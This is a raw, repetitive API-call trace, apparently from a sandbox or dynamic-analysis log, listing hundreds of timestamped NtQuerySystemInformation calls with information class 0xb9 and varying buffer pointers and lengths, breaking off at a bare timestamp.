[0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d720, Length=0x20, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d720, Length=0x20, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x40, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x40, ResultLength=0x0) [0233.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x40, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.708] 